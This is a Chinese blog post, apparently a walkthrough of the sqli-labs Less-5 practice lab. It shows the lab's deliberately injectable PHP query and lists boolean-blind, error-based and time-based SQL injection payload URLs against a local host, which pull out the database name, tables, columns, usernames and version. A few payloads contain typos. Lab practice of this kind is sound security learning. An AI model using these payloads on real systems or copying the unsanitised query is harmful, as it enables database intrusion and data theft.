三种方式简单实践一下sql盲注

Less-5

简单的源码分析一下

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; //单引号闭合
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

//如果语句正确返回界面正常,否则返回错误.没有返回数据的地方

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

利用函数逻辑来判断

注:以下都是利用二分法进行判断

判断数据库版本号第一位是否为5(已知版本号为5)

http://127.0.0.1/Less-5/index.php?id=1'and left(version(),1)=5--+//如果是则返回页面正确,否则页面错误

判断数据库长度

http://127.0.0.1/Less-5/index.php?id=1'and length(database())=8--+

判断数据库第一个字母是否大于a

http://127.0.0.1/Less-5/index.php?id=1' and left(database(),1)>'a'--+

判断数据库前二个字母

http://127.0.0.1/Less-5/index.php?id=1'and left(database(),2)>'sa'--+

利用substr()和ascii()进行注入

ascii(substr((select table_name from infromation_schema.tables where tables_schema=database() limit 0,1),1,1))=101

获取第二位字符直接substr(string,2,1)就好了

获取第二个表,直接limit 0,1 --> limit 1,1就好了

利用regexp来后去users表中的列

http://127.0.0.1/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and table_name regexp '^us[a-z]' limit 0,1)-- +

选择users表中的列名是否有us**的列

http://127.0.0.1/Less-5/index.php?id=1' and 1=(select 1 from infromation_schema.columns where table_name='users' and column_name regexp'^username' limit 0,1)-- +

利用ord()和mid()函数

http://127.0.0.1/Less-5/index.php?id=1' and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1)1,1))=68

报错注入

``http://127.0.0.1/Less-5/?id=1’union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+`

double 数值类型超出范围

``http://127.0.0.1/Less-5/?id=1’union select (exp(~(select * from (select user())a))),2,3–+`

bigint 溢出报错

``http://127.0.0.1/Less-5/?id=1’union select (!(select * from (select user())x) - ~0),2,3–+`

xpath函数报错

``http://127.0.0.1/Less-5/?id=1’and extractvalue(1,concat(0x7e,(select @@version),0x7e))–+`

``http://127.0.0.1/Less-5/?id=1’and updatexml(1,concat(0x7e,(select @@version),0x7e),1)–+`

利用数据的重复性

``http://127.0.0.1/Less-5/?id=1’union select 1,2,3 from (select name const(version(),1),name const(version(),1))x–+`

延时注入

``http://127.0.0.1/Less-5/?id=1’and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+`

错误的时候会有5秒的延迟

benchmark()延时

``http://127.0.0.1/Less-5/?id=1’union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode(‘msg’,‘by 5 seconds’)),null)),2,3 from (select database()as current)as tb1–+`

当结果正确的时候,运行encode(‘msg’,‘by 5 seconds’)操作5000000次会占用一段时间

个人自建博客:
http://pigdaqiang.top
简书:
https://www.jianshu.com/p/3cefb0134f89